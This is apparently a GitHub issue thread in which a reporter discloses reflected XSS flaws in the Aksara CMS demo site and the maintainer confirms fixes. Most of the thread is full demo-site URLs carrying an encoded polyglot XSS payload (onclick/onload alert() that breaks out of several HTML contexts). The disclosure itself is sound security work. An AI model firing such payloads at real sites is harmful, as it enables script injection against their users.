### ISSUE TITLE
[bug] XSS in search parameter

### ISSUE THREAD

**Issue by bangil0** [abydahana/aksara#196]
apakah ini merupakan Bug XSS
![Screenshot from 2022-05-27 11-47-26](https://user-images.githubusercontent.com/11605614/170632337-e3f8e203-b66d-4051-9809-1aa42c16c22e.png)

https://demo.aksaracms.com/blogs/search?aksara=db9f02&q=%2F%2A-%2F%2A%60%2F%2A%5C%60%2F%2A%2527%2F%2A%22%2F%2A%2A%2F%28%2F%2A%2520%2A%2FoNcliCk%3Dalert%28%29%2520%29%2F%2F%250D%250A%250d%250a%2F%2F%3C%2FstYle%2F%3C%2FtitLe%2F%3C%2FteXtarEa%2F%3C%2FscRipt%2F--%21%3E%5Cx3csVg%2F%3CsVg%2FoNloAd%3Dalert%28%29%2F%2F%3E%5Cx3e

**Comment by abydahana** [comment]
Fixed with latest commit #197

**Comment by bangil0** [comment]
xss di url segment

- https://demo.aksaracms.com/galleries?%22%20jaVasCript%3A%2F%2A-%2F%2A%60%2F%2A%5C%60%2F%2A%27%2F%2A%22%2F%2A%2A%2F%28%2F%2A%20%2A%2FoNcliCk%3Dalert%28%29%20%29%2F%2F%250D%250A%250d%250a%2F%2F%3C%2FstYle%2F%3C%2FtitLe%2F%3C%2FteXtarEa%2F%3C%2FscRipt%2F--%21%3E%5Cx3csVg%2F%3CsVg%2FoNloAd%3Dalert%28%29%2F%2F%3E%5Cx3e%22

- https://demo.aksaracms.com/blogs/sport?%22%20jaVasCript%3A%2F%2A-%2F%2A%60%2F%2A%5C%60%2F%2A%27%2F%2A%22%2F%2A%2A%2F%28%2F%2A%20%2A%2FoNcliCk%3Dalert%28%29%20%29%2F%2F%250D%250A%250d%250a%2F%2F%3C%2FstYle%2F%3C%2FtitLe%2F%3C%2FteXtarEa%2F%3C%2FscRipt%2F--%21%3E%5Cx3csVg%2F%3CsVg%2FoNloAd%3Dalert%28%29%2F%2F%3E%5Cx3e%22

- https://demo.aksaracms.com/blogs/tags/?%22%20jaVasCript%3A%2F%2A-%2F%2A%60%2F%2A%5C%60%2F%2A%27%2F%2A%22%2F%2A%2A%2F%28%2F%2A%20%2A%2FoNcliCk%3Dalert%28%29%20%29%2F%2F%250D%250A%250d%250a%2F%2F%3C%2FstYle%2F%3C%2FtitLe%2F%3C%2FteXtarEa%2F%3C%2FscRipt%2F--%21%3E%5Cx3csVg%2F%3CsVg%2FoNloAd%3Dalert%28%29%2F%2F%3E%5Cx3e%22

**Comment by abydahana** [comment]
> xss di url segment
> 
> * https://demo.aksaracms.com/galleries?%22%20jaVasCript%3A%2F%2A-%2F%2A%60%2F%2A%5C%60%2F%2A%27%2F%2A%22%2F%2A%2A%2F%28%2F%2A%20%2A%2FoNcliCk%3Dalert%28%29%20%29%2F%2F%250D%250A%250d%250a%2F%2F%3C%2FstYle%2F%3C%2FtitLe%2F%3C%2FteXtarEa%2F%3C%2FscRipt%2F--%21%3E%5Cx3csVg%2F%3CsVg%2FoNloAd%3Dalert%28%29%2F%2F%3E%5Cx3e%22
> * https://demo.aksaracms.com/blogs/sport?%22%20jaVasCript%3A%2F%2A-%2F%2A%60%2F%2A%5C%60%2F%2A%27%2F%2A%22%2F%2A%2A%2F%28%2F%2A%20%2A%2FoNcliCk%3Dalert%28%29%20%29%2F%2F%250D%250A%250d%250a%2F%2F%3C%2FstYle%2F%3C%2FtitLe%2F%3C%2FteXtarEa%2F%3C%2FscRipt%2F--%21%3E%5Cx3csVg%2F%3CsVg%2FoNloAd%3Dalert%28%29%2F%2F%3E%5Cx3e%22
> * https://demo.aksaracms.com/blogs/tags/?%22%20jaVasCript%3A%2F%2A-%2F%2A%60%2F%2A%5C%60%2F%2A%27%2F%2A%22%2F%2A%2A%2F%28%2F%2A%20%2A%2FoNcliCk%3Dalert%28%29%20%29%2F%2F%250D%250A%250d%250a%2F%2F%3C%2FstYle%2F%3C%2FtitLe%2F%3C%2FteXtarEa%2F%3C%2FscRipt%2F--%21%3E%5Cx3csVg%2F%3CsVg%2FoNloAd%3Dalert%28%29%2F%2F%3E%5Cx3e%22

Fixed the vulnerability under the pagination: #202 

- [ ]
